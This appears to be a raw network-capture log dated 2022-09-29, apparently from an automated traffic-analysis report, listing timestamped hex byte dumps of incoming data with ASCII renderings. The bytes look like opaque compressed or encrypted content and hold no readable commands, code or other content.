                                                                                                                                                2022-09-29 12:51:45 UTC22825INData Raw: 1d f7 17 6c d0 58 da da 7e 6c d5 c9 d5 dc 50 af 75 6e 8f 78 b0 7e 6a b2 08 dc ca c3 a7 f3 c0 e1 6b c0 09 86 ca 08 fe d4 ae 0f 98 b7 62 b5 85 ad 48 3f 0d 0b 1d 38 69 a5 5a 9b d8 cc 4c 7c 56 85 f9 ed 80 b0 9c 90 56 2b e9 56 09 78 64 b8 77 2b 31 df 50 bd ff 47 22 c3 50 84 97 c9 5d 49 66 a4 40 0b 10 d6 74 01 da b3 57 42 48 13 26 ce c2 6c 4a 33 cf 16 19 ca e9 75 be b7 61 bd cd 55 43 c7 28 23 1b 8d 48 f0 9b f4 34 11 8a c8 92 12 3c 94 d3 0b 14 19 90 12 5b f9 9e fe fd 85 56 d7 19 3d f0 22 cb ed a5 ac b1 52 2a 53 b4 4b 3f 32 43 cd 71 d3 e0 6c a8 06 8e 89 fc f3 89 5a 8c a7 0d 0d e1 45 13 bd 6a b4 40 0f 96 bb 19 68 30 c9 6f 1e 9b 8c 2f bb 38 93 be ab 40 0e 61 18 0b 2b f7 58 42 c7 97 b3 4b 4d c9 e0 30 f6 64 e2 02 2f 7e 28 85 ff 56 99 3a 0a 40 ab fe d0 82 b6 78 2d ab
                                                                                                                                                Data Ascii: lX~lPunx~jkbH?8iZL|VV+Vxdw+1PG"P]If@tWBH&lJ3uaUC(#H4<[V="R*SK?2CqlZEj@h0o/8@a+XBKM0d/~(V:@x-
                                                                                                                                                2022-09-29 12:51:45 UTC22841INData Raw: 4c ab 6e 34 42 e1 7b 14 cf d8 f4 06 99 04 a8 a7 44 64 46 15 d5 f6 79 a8 9f 51 15 6b f8 8e 3f 6f b5 51 5e f0 75 fa 58 8d 26 d2 f7 40 af d6 a4 19 e1 09 6d ea 34 1d b7 f0 04 53 d0 46 77 7a 33 26 af a6 bd db 20 cc cc a0 9e 6a f7 ac 38 90 ea 3f 6b 59 23 23 fa 09 63 a0 46 66 d7 c0 3e 13 91 44 20 03 d2 77 eb 05 2c 5d e6 05 04 3c 3a 34 b1 ef 19 ed 31 55 9a f0 79 f8 ae 68 d7 00 24 2b d0 ce d6 a3 0a 50 4c d4 a0 89 ad be f6 a0 89 1c 26 59 92 b8 b3 e9 e7 53 f2 97 77 c9 a2 df a2 35 b8 d2 8d 87 79 5d fa 10 1c ca ed 8c a5 0b 46 67 da a5 82 b1 17 09 5b 0f be 4f ec ed fd 1c f0 1b 22 ba 3e 8d bb 90 75 f6 f7 4f dc e4 31 14 98 64 51 26 21 f7 10 d4 0a a3 4a 4c 06 2a 09 80 27 d6 06 c4 5a a2 51 8a f8 82 3a 29 bd 12 4d b0 61 45 0e 5a 2a e7 29 4c 18 a1 4d 52 1f 13 be 77 89 5f e2
                                                                                                                                                Data Ascii: Ln4B{DdFyQk?oQ^uX&@m4SFwz3& j8?kY##cFf>D w,]<:41Uyh$+PL&YSw5y]Fg[O">uO1dQ&!JL*'ZQ:)MaEZ*)LMRw_
                                                                                                                                                2022-09-29 12:51:45 UTC22857INData Raw: c8 23 36 1b a8 39 75 48 30 00 24 02 b8 0c 39 68 7f b7 b4 d0 d5 10 ed ca 70 45 f1 d5 c1 b5 89 b3 6c 63 9e b9 d9 a4 bc e1 a6 07 b3 e5 b2 26 b3 38 8d 51 d0 5d 5f 36 68 8f 46 b4 a4 37 cf c0 a7 53 cb 0e 46 c2 28 c5 ec ce 02 74 54 37 4e cf 5f 1e 2f 1b e4 65 a7 c6 e5 e0 ae 55 61 00 8c d0 01 7b 77 15 00 ca 22 83 b2 a4 96 88 db 0c 5f 55 f6 f6 8a 07 48 77 7e 1f db 20 9b 17 dc c2 c6 7b 5a 71 3a 5e 3c eb fc 4a 09 3c e2 1f d9 41 1b dc d0 af c3 ec 54 0c 9e 25 70 f7 ea 41 bd 84 4d da 85 94 7e d9 58 2c 2f 35 8b 0a bc ec 82 28 13 42 1f fe bf c0 18 ae ce d3 ba 77 75 6c bb 88 93 5e 65 22 56 53 94 3e 86 6c 61 12 9a b2 d6 da 10 4f 06 96 e6 f4 96 07 41 be f5 e4 1c cd ec df 3f e8 97 38 f7 aa 6a 47 6b a4 d6 45 d2 ab 80 29 8f c0 b5 e3 c4 89 f1 12 34 2c ed 5c 01 15 f3 fd bd b7 13
                                                                                                                                                Data Ascii: #69uH0$9hpElc&8Q]_6hF7SF(tT7N_/eUa{w"_UHw~ {Zq:^<J<AT%pAM~X,/5(Bwul^e"VS>laOA?8jGkE)4,\
                                                                                                                                                2022-09-29 12:51:45 UTC22873INData Raw: e3 e7 58 b8 43 46 54 e4 41 a9 cd 34 83 75 29 1c 32 ea 1a 1f 0a 46 b9 f3 2f 20 55 a4 68 25 61 e9 59 e2 16 75 5b 4c 4f ae 00 20 ec 2c 2d 7f 94 2f 14 51 4e 6e a5 02 37 48 35 54 19 f4 4b 5f 6e e1 41 ff f4 3a 26 37 53 fa f6 6e 52 8c 66 96 7f 03 ad 23 f4 29 44 21 7f d8 71 60 26 f8 d3 78 cb 87 91 15 41 56 00 1b 88 01 b1 db 41 ce f9 7f 7c 66 7e 45 4d 0d 60 0a 44 e7 6c eb 13 1c 00 8f ad 7f bd 47 cd b7 f5 b3 ee 14 de d8 ee 13 6b 88 b8 46 f0 f5 73 b6 6b 08 0c cf 94 21 9b db 39 4d 0b b8 85 4c 7f 70 8d 71 db 2f f7 29 fe 25 17 8a 84 63 ca 89 9b 8d 73 ab e0 e1 09 b5 17 17 4b 9d d4 b3 f5 b1 dc 17 24 6e 80 34 30 f0 d2 c3 45 c8 bf 95 d5 34 1b ac 7c dc f9 f4 b9 4f 43 b3 31 26 e6 3f b8 34 7d f7 5b 19 8a f4 f9 40 05 3b 2e c2 50 4d 9d 3f c2 12 88 5c 33 da eb a8 e8 44 94 cc e9
                                                                                                                                                Data Ascii: XCFTA4u)2F/ Uh%aYu[LO ,-/QNn7H5TK_nA:&7SnRf#)D!q`&xAVA|f~EM`DlGkFsk!9MLpq/)%csK$n40E4|OC1&?4}[@;.PM?\3D
                                                                                                                                                2022-09-29 12:51:45 UTC22889INData Raw: 00 62 4e ac 16 94 b0 b7 d2 d2 29 48 ce 45 9b 2d 06 28 1d 4b 25 78 12 d4 91 08 08 97 e0 99 5d 67 f1 08 2e f7 d8 0f f5 49 f1 a3 29 1d fe 0e a6 7f 78 da f4 76 ad 2f 07 db f1 00 05 3f 6a 01 7e fd 32 73 73 d8 c7 84 87 84 09 ce e4 f5 f8 11 84 da c9 21 7a 92 dc 10 58 ff c5 3f 4c f5 ec 07 b2 d2 bc 3e 77 0e 7d 9a 2f fd ff 2f d1 c6 4a 4d c5 d1 e4 2d 1c c6 53 2c 13 94 a2 60 7a 94 0f 4c 49 26 63 30 ef a5 56 91 da 3c fb 34 9c 05 af ee d4 aa ba 6d 00 22 5c 69 a5 ca 7f 8f d4 3a fb a1 25 22 37 0d 58 55 43 89 ec d6 d3 d5 f3 c9 f7 33 2d e8 ef 11 21 fb e8 b7 2b 6f 6f 58 bd ff 12 d1 71 07 ef 85 da cd 5b 99 74 79 8b 4c ca bf f9 7c 55 d0 8b 9b 78 f1 f7 12 19 cb 82 3d c5 7b 23 d7 41 70 00 08 8d c1 e6 22 94 f4 41 04 54 64 d7 19 41 28 d9 8b 54 ff 18 51 18 48 6e c5 f3 aa 62 32 e6
                                                                                                                                                Data Ascii: bN)HE-(K%x]g.I)xv/?j~2ss!zX?L>w}//JM-S,`zLI&c0V<4m"\i:%"7XUC3-!+ooXq[tyL|Ux={#Ap"ATdA(TQHnb2
                                                                                                                                                2022-09-29 12:51:45 UTC22905INData Raw: 37 16 41 82 0b 21 91 81 b4 f0 98 7e 55 57 7b d2 e7 a6 7d b0 e6 e7 de f8 b3 9c f6 d1 c3 de 68 46 49 77 b5 f4 7d b4 5e f2 6b 73 f8 39 df e4 91 ca 4f d7 79 a0 b3 7f 27 f3 53 cb f8 34 86 eb f2 05 89 7c 30 8b 6c 34 35 67 a1 49 e9 50 cc 5a 96 9c 98 6d e8 18 27 0f 71 ba 87 5b 66 a1 5b 13 97 53 6d a8 9d 11 30 fe 4e 67 91 cf f3 3e 37 9e e9 4f 84 4d c3 33 49 50 77 17 aa d4 54 61 97 b4 68 92 b0 e8 38 0d 8a a2 a5 68 19 8a d2 41 5c 0a c4 10 32 42 18 3d cb 02 30 25 b2 87 10 ed 0d bc 9b 23 83 e8 db b4 82 54 9a a5 a4 e2 c7 20 ce 33 f1 1e 1c da fd 76 dd e6 82 1d 31 b8 c0 6f b1 35 76 b2 0e 66 75 c3 9c e7 b0 0f 57 bf 91 5d b1 bd 3a 1d 31 1f a2 d0 49 7a 51 c6 77 60 bc df 10 b3 0e a2 b8 aa 1c b4 fb 64 ee a1 33 5d 6a b8 98 28 ee 36 4d 03 37 33 59 37 48 bf 42 26 97 0e ff df 5c
                                                                                                                                                Data Ascii: 7A!~UW{}hFIw}^ks9Oy'S4|0l45gIPZm'q[f[Sm0Ng>7OM3IPwTah8hA\2B=0%#T 3v1o5vfuW]:1IzQw`d3]j(6M73Y7HB&\
                                                                                                                                                2022-09-29 12:51:45 UTC22921INData Raw: 3b de d0 41 c5 b4 ab d8 40 3a 18 fc c5 36 23 02 36 bb 6d 4d 78 0c 3c 39 13 ba 64 ca 49 71 2b 73 bc 69 ed 3e e3 09 bb eb 16 6e d6 df d0 00 80 0c fb 2c b6 06 c6 b7 5f 5e f6 5e a3 69 95 4b 53 a4 7b 76 0e f7 4d 46 57 22 24 bc 8b 05 99 30 59 26 82 33 f5 d3 87 90 b9 37 8e 3e 96 96 0f 10 be 72 37 e5 b3 76 59 34 ed d8 35 f7 31 46 5f b0 c2 4c 53 8e c6 e8 41 67 d6 0b 7c 5e 96 91 6b 0c 89 b4 1d a2 c4 d6 dd 52 29 52 79 3f 57 04 5f dc b7 b5 c9 75 69 7c ca 0a c0 12 7c 15 9e e5 21 bd 2d 19 cd c2 b2 0b 4f 08 aa b6 03 b5 0c c8 5e 6a b2 6e d4 f7 f3 3d 2f fb 10 62 42 ab dc 7a 9f 54 e8 70 dc e9 a1 79 71 85 41 28 48 da ac 70 0f 9b db 79 e9 57 e8 be 82 a0 bb 59 f1 b2 6b a0 2a 8d a9 34 d2 c4 e7 5e e9 77 c1 f0 e0 c9 e9 c4 56 5c f5 12 c1 0a 54 92 83 d8 d1 e8 b0 be e0 ad a8 40 81
                                                                                                                                                Data Ascii: ;A@:6#6mMx<9dIq+si>n,_^^iKS{vMFW"$0Y&37>r7vY451F_LSAg|^kR)Ry?W_ui||!-O^jn=/bBzTpyqA(HpyWYk*4^wV\T@
                                                                                                                                                2022-09-29 12:51:45 UTC22937INData Raw: 3e 8c c3 be 7d d3 56 45 27 c0 3e 8e b5 fa 87 7b ce 03 6b 69 1f 79 45 ae 89 97 08 3b 4e 05 fd 7f 4a 3b a7 6f 4e 12 8e 3f 3a 8a f2 c6 e2 da f1 38 79 ef 4a f6 34 4d 8a 71 05 90 e1 dc e3 8d 0f c8 80 80 48 95 c8 73 dc 3e fb d1 10 75 ea d3 4e b1 40 ee ea df 29 44 b3 7b e7 65 c0 44 8f a3 82 43 e7 14 bc 07 90 bf 5d 29 6c 33 68 4b 3a bd d7 f9 44 41 b8 ad d2 23 d3 27 60 66 17 3e 34 13 7d 34 bc 60 f7 0e c6 87 03 8e f0 91 ed d5 bb b1 50 9b 3d bc 06 fe dc 2f 3b 25 03 93 90 12 29 50 59 63 6f 05 69 b5 d0 c5 1b 34 92 37 04 4a e3 1b dc d3 1d e3 b3 0b 06 f8 b0 02 2b 58 e3 b0 a5 2c 49 60 19 03 28 c6 ce d2 c6 dc 77 a9 70 44 1c bf f2 51 fb c7 47 66 28 c4 3b e6 e5 30 53 4d 6f 7e 3b 27 17 58 08 4e 06 11 8b d3 12 72 72 ac b7 e1 bc d5 7a f3 8a 94 40 78 8b 13 4f 70 6a b9 11 d7 c1
                                                                                                                                                Data Ascii: >}VE'>{kiyE;NJ;oN?:8yJ4MqHs>uN@)D{eDC])l3hK:DA#'`f>4}4`P=/;%)PYcoi47J+X,I`(wpDQGf(;0SMo~;'XNrrz@xOpj
                                                                                                                                                2022-09-29 12:51:45 UTC22953INData Raw: 1f 98 7b 23 17 79 f1 2d 73 13 99 f4 34 40 fa 6c 92 48 6f 27 c0 e4 17 7f a7 5d 23 3d bd 5e 5a f8 28 5d 8f c8 a2 c3 73 34 81 d4 fb 6b c0 20 af a0 7e 92 7e 91 53 4f cb d3 30 24 17 ff 79 39 f2 43 66 a3 b0 71 c2 58 e1 62 c3 36 36 8c 30 99 e6 dc 9e 34 77 25 fb 93 36 53 c5 3f 8e cb 48 aa 52 12 09 d4 60 ba 56 8c 2f 1f 55 ef 01 68 ec 43 cc ba e7 ad ed a6 81 f4 2c 3c a3 76 92 d1 99 7d 13 c5 6a cd 1a 65 17 03 a0 ac 7d fb 2c 8e ef 86 13 c4 49 e6 3e f5 c1 ca bb 3d 37 ea 04 20 70 99 b3 94 e3 a7 54 18 fb 1e 55 58 5f 6e 49 b1 f1 7b 97 81 31 68 f0 29 ff 5d c8 07 60 fc e3 07 44 c4 2e a7 47 42 33 1e 55 71 58 82 29 bd f0 6b c4 32 4e 5e e8 05 02 1c 0f 77 2f b2 ec ac bc ff cd 4d 3a fe 88 d9 4e 6d eb 9d c0 05 1e a9 f4 aa e1 8d fe a2 84 45 58 48 c1 d0 78 60 1d da d2 ae ab 63 8e
                                                                                                                                                Data Ascii: {#y-s4@lHo']#=^Z(]s4k ~~SO0$y9CfqXb6604w%6S?HR`V/UhC,<v}je},I>=7 pTUX_nI{1h)]`D.GB3UqX)k2N^w/M:NmEXHx`c
                                                                                                                                                2022-09-29 12:51:45 UTC22969INData Raw: d8 90 e4 67 95 17 b4 28 3f ac fa ed 1a 4f 1c dc 6c ae bb 1f eb e0 07 a3 22 10 c5 25 70 9a 1f b1 0e 29 fe ec dd 0d bc 57 48 f4 ec bd ac f4 c6 40 96 ef 28 dc 4b 62 8f 0d d4 8c 46 ea b3 01 86 54 b1 f3 96 f2 b1 41 2d cf 8a be 69 9a c6 27 b4 8e f2 5e 61 a8 aa 88 7c 10 69 85 c5 38 a7 23 29 15 28 2c 7d b0 35 0e 08 9a 96 c8 44 7f ef 44 e5 97 8f c5 6c 10 e9 a3 ae d7 58 d8 93 c9 f1 fc 08 17 65 90 af 24 33 6e c7 b3 ad 55 51 b2 76 57 53 5b ef 4d 1c 71 f2 f6 ad de dd 3a 64 d0 a5 2e 78 c0 60 6a 20 be 6d 20 9a 27 fd 2e 05 49 76 2e ed 30 12 76 74 a0 b9 41 03 bd d7 9d b9 9a 91 12 2f 46 8b 26 ea 3a e7 32 a0 d4 79 08 a8 17 5d de ad 7d 3b fb f2 33 40 ee 16 88 16 60 59 df c5 56 1b f2 fb 1d 5d 88 5d a0 42 09 8a e4 d7 36 f6 ca ba 4c 73 cc c1 59 57 7c 25 40 dd 96 01 b7 3c 59 29
                                                                                                                                                Data Ascii: g(?Ol"%p)WH@(KbFTA-i'^a|i8#)(,}5DDlXe$3nUQvWS[Mq:d.x`j m '.Iv.0vtA/F&:2y]};3@`YV]]B6LsYW|%@<Y)
                                                                                                                                                2022-09-29 12:51:45 UTC22985INData Raw: e9 e6 75 9b 31 e4 80 52 24 9c 51 67 73 4f 56 85 d4 38 fa b3 dd 2e 18 d4 ab 7c ed 90 55 f9 3e 05 d5 23 83 16 39 9a ca f1 3c a6 1d c1 7b 92 db 14 73 49 02 13 ed 64 72 5b 46 c0 68 d2 0b 5a af 7a d9 64 d4 66 c0 a2 8f 24 3c e3 14 ef 40 45 57 ea 4e 54 46 6f 47 8d 00 db 67 80 30 b8 c8 1b 5d 1a 5f 54 ab 04 e7 94 e0 82 c0 82 73 9f 28 c5 02 6e d2 66 90 8b da 91 9e 4c d0 46 1a 7f 4f 15 76 b7 9a 27 de f3 e5 65 67 d8 49 3b b5 72 b3 df ee b5 27 14 df 85 41 96 88 73 c6 f1 05 15 b0 7b 8b a3 b0 e2 cd 94 ce bb 18 da 33 bc f6 3d 1b 94 89 45 c8 2c 80 bf 38 8c c7 a0 43 d9 73 59 82 ab ce 07 4b 38 0e 16 04 81 08 2c ef 0a 77 cf 83 f1 ff 1b cb 19 95 a7 1c 0f 8d 1d 44 42 05 e4 a7 f1 98 5b f4 58 3f af cb 5f d5 da f9 9b 93 97 91 37 5f 2b bf b0 f7 7b e3 26 2f ae 8b d7 24 d1 2a a1 89
                                                                                                                                                Data Ascii: u1R$QgsOV8.|U>#9<{sIdr[FhZzdf$<@EWNTFoGg0]_Ts(nfLFOv'egI;r'As{3=E,8CsYK8,wDB[X?_7_+{&/$*
                                                                                                                                                2022-09-29 12:51:45 UTC23001INData Raw: c8 d2 1a 99 3c 3c 54 a1 68 ae 0c a5 c7 20 ee 3d be cd e9 86 7e 26 17 8b 49 16 54 17 27 07 97 c6 84 8b da 2d 4c 9e 97 46 17 9a b8 cb a9 17 f3 37 e5 bc 24 12 83 1d 1f 94 1f 85 f0 ef cb 6e 7e d1 6f 69 4a 09 e4 97 75 42 b1 da 49 76 e1 ed c1 ab 4c ad 51 65 51 35 d1 bc c2 38 b2 e8 7e 3e f5 88 ae 0b d7 66 a9 26 3c 7d f5 8d fd 04 64 9b 65 99 c7 d9 f6 4a 83 48 2a ec 6a 2b 43 ce 65 f3 9b fd 15 30 30 10 3f 37 43 93 fe 99 49 97 de 66 bb fc 8f 9c 71 0d 48 bb 08 dd 0a 25 2c 13 16 9e 40 51 00 9f 14 e7 77 15 ac 0d de e3 b7 d8 1c a6 ba 4a cd a3 0f cb 00 6b 10 33 0b 26 0d a1 7d 6c 3d 7b bb 24 db 6d 5b 9b 80 f8 45 95 73 cb 69 08 24 0b 81 d8 04 e8 dc ba c2 0e a5 7f 17 6e 47 50 43 d5 a1 bf 6b 65 20 67 3a b5 2d 74 b8 d4 46 88 e0 b0 c4 c3 0f 2a 2b fc a9 ff 1d 4d 6c 2d bd 7c c2
                                                                                                                                                Data Ascii: <<Th =~&IT'-LF7$n~oiJuBIvLQeQ58~>f&<}deJH*j+Ce00?7CIfqH%,@QwJk3&}l={$m[Esi$nGPCke g:-tF*+Ml-|
                                                                                                                                                2022-09-29 12:51:45 UTC23017INData Raw: c9 e2 e9 2f 17 54 e6 33 a5 33 e1 62 9d 1e 58 8f be 71 c2 6a f0 27 53 f6 f3 51 56 7d ed d0 27 33 d9 13 fc d7 2b 6b c7 93 c9 22 d4 ce 55 2e f3 57 a4 a0 84 07 ff 1e 71 93 04 30 48 53 81 9f 4b 2c b8 b4 bd 1a dd 8f 32 ae e3 d3 79 e1 ef 35 6e 31 86 3b af 1d 81 cd c7 04 3b ee 52 04 08 5a 4b 94 41 c2 b3 41 74 fe ea 76 42 60 9a 56 a3 56 66 a1 dd 05 fd fc ca c9 08 32 ca 26 3d 7a 9d 9d b0 31 05 39 f4 f7 5d 54 ba 4b 3d e3 fa 33 56 f3 a7 2b bc 3a d4 ca b8 d7 6a d2 7b a2 b8 b0 75 19 ea 7d 8e bb cc a0 85 d3 cc df 20 7c 5d 14 3d f7 7a 9c 85 89 ab 29 a8 af 2d fc 90 0d 4c eb 79 94 8e d1 b2 1e 54 a5 fa 7f 50 09 a1 aa e6 15 1d df 61 b4 6e e1 55 dc 38 e9 18 e2 27 fe fe 61 4c ce 4f 12 c0 40 93 28 e9 53 58 31 f2 08 7c 4e 80 d9 21 4a fd dd 5f e3 6e 98 e1 c1 7c 02 b9 8d b1 e6 e4
                                                                                                                                                Data Ascii: /T33bXqj'SQV}'3+k"U.Wq0HSK,2y5n1;;RZKAAtvB`VVf2&=z19]TK=3V+:j{u} |]=z)-LyTPanU8'aLO@(SX1|N!J_n|
                                                                                                                                                2022-09-29 12:51:45 UTC23033INData Raw: 7c 53 f6 75 63 6f 5a c6 19 94 7d aa 1e e7 73 9e 36 aa bb 7c 4b b6 c0 45 58 d5 5b 6c 20 1d 55 5d c4 e4 23 8e 3d 72 39 38 1d 43 68 52 18 c5 38 12 d3 91 75 ac c0 47 31 aa af 5e 5b f9 c5 95 51 3c cb 0d 81 bb 50 f7 c0 3c 2e df cd 39 91 6d bf 5a 43 97 70 9b 17 ac 8c 06 b6 58 c1 e2 08 4d 02 77 4a 06 49 17 89 f0 31 0c d5 81 b3 c0 32 e4 53 23 83 c4 39 35 f7 47 71 af a1 d9 54 df dc ff 38 f1 f5 3c ed 26 df df cd f1 ed 48 87 62 30 ed e9 dd b9 32 f3 18 92 05 76 30 5b 04 49 e6 cf a7 32 ba f3 c5 05 f9 0d 1f bb b7 d7 3b 2b c7 83 52 09 5d 06 fc e5 9b 65 4d ea c2 07 e7 03 df 94 cf 08 9d 5a f8 4d 1f 53 fc 69 73 7d 83 7a f0 4b b0 be 9a 69 32 5e bf f0 08 4b c9 5a 51 1d b4 82 f4 93 d5 1d 19 8d 37 00 67 c4 fc 3a fc 80 82 05 e7 73 b1 64 3b 73 aa da aa ac 8a 5a be 81 be 80 4d 9f
                                                                                                                                                Data Ascii: |SucoZ}s6|KEX[l U]#=r98ChR8uG1^[Q<P<.9mZCpXMwJI12S#95GqT8<&Hb02v0[I2;+R]eMZMSis}zKi2^KZQ7g:sd;sZM
                                                                                                                                                2022-09-29 12:51:45 UTC23049INData Raw: 02 a4 37 68 a7 c9 b3 0f 5a 05 a5 eb ba 5d 6d b7 9a 81 e6 fd 67 d4 d1 d6 1b 01 e4 8b 4b 74 6b 9f ab 62 3c 2d f4 b3 ad bb b9 91 91 d8 48 2c 2c 9d a3 37 0c 9c 11 88 98 3d cb 8a d5 65 1e d3 2f b7 19 dc 2a a2 02 53 df 76 cb 21 2d 3b cd ce 1e d5 c8 7c d0 92 38 ec 56 36 56 01 58 aa c6 e7 ce b3 13 51 8b 35 73 25 cf 01 a7 c5 1c 82 d7 47 31 ba 41 a5 e1 58 ab 19 c4 8d 3f 3b e3 65 a4 a1 b0 66 a6 78 c3 74 8a d9 92 e8 47 5d 4c 5c 41 b7 04 78 8c b7 a4 a0 d1 b3 82 51 d7 98 f0 d3 0e e9 4c 52 03 48 be 9f eb ce 0c 22 28 48 e9 95 47 fb 8d d5 c5 a1 2b e0 0d 7b 5f a3 8b 13 92 91 ef 0f 83 d5 d0 d1 db 32 90 24 80 96 ad a6 43 1b 0d 2b 19 27 2f d5 bf 1d f7 71 a6 2a af cc cc 73 fd ac dc e2 49 83 5b 7f 92 57 5e 47 69 58 51 d6 4c 65 e6 ec f4 42 b0 0d b9 ff 9a 2e f9 50 08 30 1e 09 c9
                                                                                                                                                Data Ascii: 7hZ]mgKtkb<-H,,7=e/*Sv!-;|8V6VXQ5s%G1AX?;efxtG]L\AxQLRH"(HG+{_2$C+'/q*sI[W^GiXQLeB.P0
                                                                                                                                                2022-09-29 12:51:45 UTC23065INData Raw: 2a fb 6c 74 a0 a3 4f 99 19 82 20 a1 0c bb 71 df 34 2c 52 e0 9c 75 86 95 c4 98 b4 19 a4 ad c2 aa b4 30 fb f9 d0 b9 91 ae 7f 3f e8 16 81 db 67 ec b8 f8 3c 0a e1 fc dd 82 50 02 26 b0 2b b3 8f 80 01 1e 03 1d 32 89 88 de fd ca e9 a0 30 10 c2 48 75 9b c0 cc 80 64 b1 f9 ac ec f2 70 1d 31 56 91 3d 7d b8 80 b9 a3 9a aa 96 50 05 3f c7 ea 02 f2 c8 70 80 a9 6a 1d 46 3c 3c 3e 70 c5 e3 f2 dd ce 2e ca 23 95 47 f2 5e df d2 c6 fa b3 a5 b9 38 86 5e eb 60 05 46 72 80 55 56 76 74 bf f4 ee 61 65 a2 07 41 06 63 90 23 c4 48 61 1d 93 17 a6 0f 07 03 36 98 16 02 1a 7f f8 b6 f2 51 2e 27 7c 6c 92 dc 1f 97 7b 04 23 47 f6 eb 76 f7 e8 ea 2c 4c 6d 17 14 5c d8 53 c6 d2 69 31 6f d1 85 13 50 99 e3 f6 ce f5 eb 8b e7 e3 c3 48 90 0d 63 5c c4 5e e3 d5 9b ac f8 6e 2c 82 c5 71 99 e0 f4 1c 3a 15
                                                                                                                                                Data Ascii: *ltO q4,Ru0?g<P&+20Hudp1V=}P?pjF<<>p.#G^8^`FrUVvtaeAc#Ha6Q.'|l{#Gv,Lm\Si1oPHc\^n,q:
                                                                                                                                                2022-09-29 12:51:45 UTC23081INData Raw: fa 14 57 fe 6f 50 f6 04 95 62 b4 d4 78 bc 4c 67 98 e2 42 7e 8d bb bd 58 ce a6 f9 10 3c e6 23 5b 85 1f d8 bf d9 c1 46 42 39 12 63 75 fe 8c ce 36 ff 11 29 ee 17 77 ee 46 e0 87 cc b5 2d 89 5a 2c 02 08 36 50 c2 1e 03 25 23 07 1a 17 3a de 71 aa a2 9a 25 cc 5d a6 dc 5e fd f2 53 c3 1e 44 94 af ff d2 bf e4 e8 6d c7 03 ce b0 ec e5 92 f5 ac be de b9 ea 69 6e fd 2d 72 fb 5c 01 ff ee 5a ad db a0 be 6b b7 30 75 e0 a8 aa 64 f5 88 01 2a d3 d8 5e 39 00 93 28 27 ab df 1b 43 46 ba dd 0b ef 2e 6a 62 19 bf 1c 66 a8 bc e9 61 66 d7 66 18 6e 35 2f 86 7c 3c 1e 16 d7 e3 a5 bf 6b 06 43 32 ef 65 3f 9b 61 ee c2 34 32 5b b2 85 0e fa 7e a3 26 77 88 cf 4e 71 6b 94 df 06 aa 9e 44 0d 97 68 b2 de 1d 6c c7 23 a4 92 8c ea 74 ed d5 7f 05 84 89 36 31 35 d3 2f 85 f4 56 36 cf 1f 8c f4 29 ee 64
                                                                                                                                                Data Ascii: WoPbxLgB~X<#[FB9cu6)wF-Z,6P%#:q%]^SDmin-r\Zk0ud*^9('CF.jbfaffn5/|<kC2e?a42[~&wNqkDhl#t615/V6)d
                                                                                                                                                2022-09-29 12:51:45 UTC23097INData Raw: 48 9f c0 fb cb 0c c3 3d 52 75 29 7d db d4 d9 92 9d 62 ac d5 bf 23 d0 68 fc 99 ac 7c 9a 1c 17 74 94 c3 a6 61 60 f7 96 95 12 91 51 a5 43 20 de d2 06 a4 9f 45 62 9d 47 5b ad 05 dc b7 61 a6 7c 0a b4 00 b7 7e 74 9c 87 d0 09 c4 5b e6 35 0b 60 8a 48 b7 9a 45 3f 53 a8 5d 8d db 3d ea 41 38 81 87 9a a9 23 a0 86 52 84 48 ca e3 41 70 1f e9 00 9e 91 65 ab a6 4d a5 49 7f 78 51 d5 6e 5b 13 f2 c7 b9 16 3f 42 fe 58 ac be 67 5d d9 4e 0d d8 c5 90 58 4c 0a 0c ce 19 29 b6 5d 0c f1 79 7b e4 37 5d 50 49 3a 50 7c 9d 8e 73 03 7d 0d 03 3c 72 31 56 39 0a fa 26 97 f6 65 51 59 f6 54 d1 c4 a8 22 6b f2 76 57 3b 93 a5 07 e6 13 12 9e d8 81 34 6b 63 6f 0d 23 b7 6c 95 7f 8d c6 64 77 fd 6b 2c cd e7 ff 93 10 35 e8 1a fe 84 f5 55 26 b9 f8 22 2d 26 46 42 20 8c 05 6b 44 9a df b4 06 3f 5b d8 78
                                                                                                                                                Data Ascii: H=Ru)}b#h|ta`QC EbG[a|~t[5`HE?S]=A8#RHApeMIxQn[?BXg]NXL)]y{7]PI:P|s}<r1V9&eQYT"kvW;4kco#ldwk,5U&"-&FB kD?[x
                                                                                                                                                2022-09-29 12:51:45 UTC23113INData Raw: 1a 31 17 19 ab 2e c6 55 90 26 e3 c7 04 8b 91 53 67 3e 97 1f 02 ea ed 8f bd ef 70 9f 1f 69 16 14 07 5a 3a fb 40 a3 81 b3 b5 c8 d0 80 7a e3 77 7b 87 ab 57 b0 95 17 0b 5b e2 4b d9 e2 76 5f ab 68 21 20 0d 8e 61 d9 77 7c ea aa e0 a8 b4 fe 92 25 29 7e 9e 98 a4 85 65 2f c2 0d f9 2f 4b 76 75 2f d3 d1 3e 67 61 24 8a f7 f2 39 b8 7e d1 62 9c 83 41 51 2d bd 7c af 47 d0 6e 41 a8 9b 5e f8 39 10 76 0a eb 60 6b ab 7f 58 ae ec 81 35 6d b8 73 b9 1a 14 bd 64 16 bb 07 c5 b8 9e 92 62 9f c6 3f 08 1d 63 37 93 5b 45 eb 0a 5e 0d 73 81 67 d7 3f 10 8d 11 26 b9 d6 a9 a5 0b c5 76 90 ca 9e c8 7c b3 dc 4e 3e 07 3c f8 6d 5c 34 e0 4c 78 de bd fc fc 09 68 c4 1e 8a 46 63 3d 95 cd 77 08 6d ec 45 eb 59 54 04 0a 67 15 55 fa a7 10 1e da ab 0f c5 65 25 e4 b6 d2 d0 8e 96 57 da cf 19 21 2c 81 ae
                                                                                                                                                Data Ascii: 1.U&Sg>piZ:@zw{W[Kv_h! aw|%)~e//Kvu/>ga$9~bAQ-|GnA^9v`kX5msdb?c7[E^sg?&v|N><m\4LxhFc=wmEYTgUe%W!,
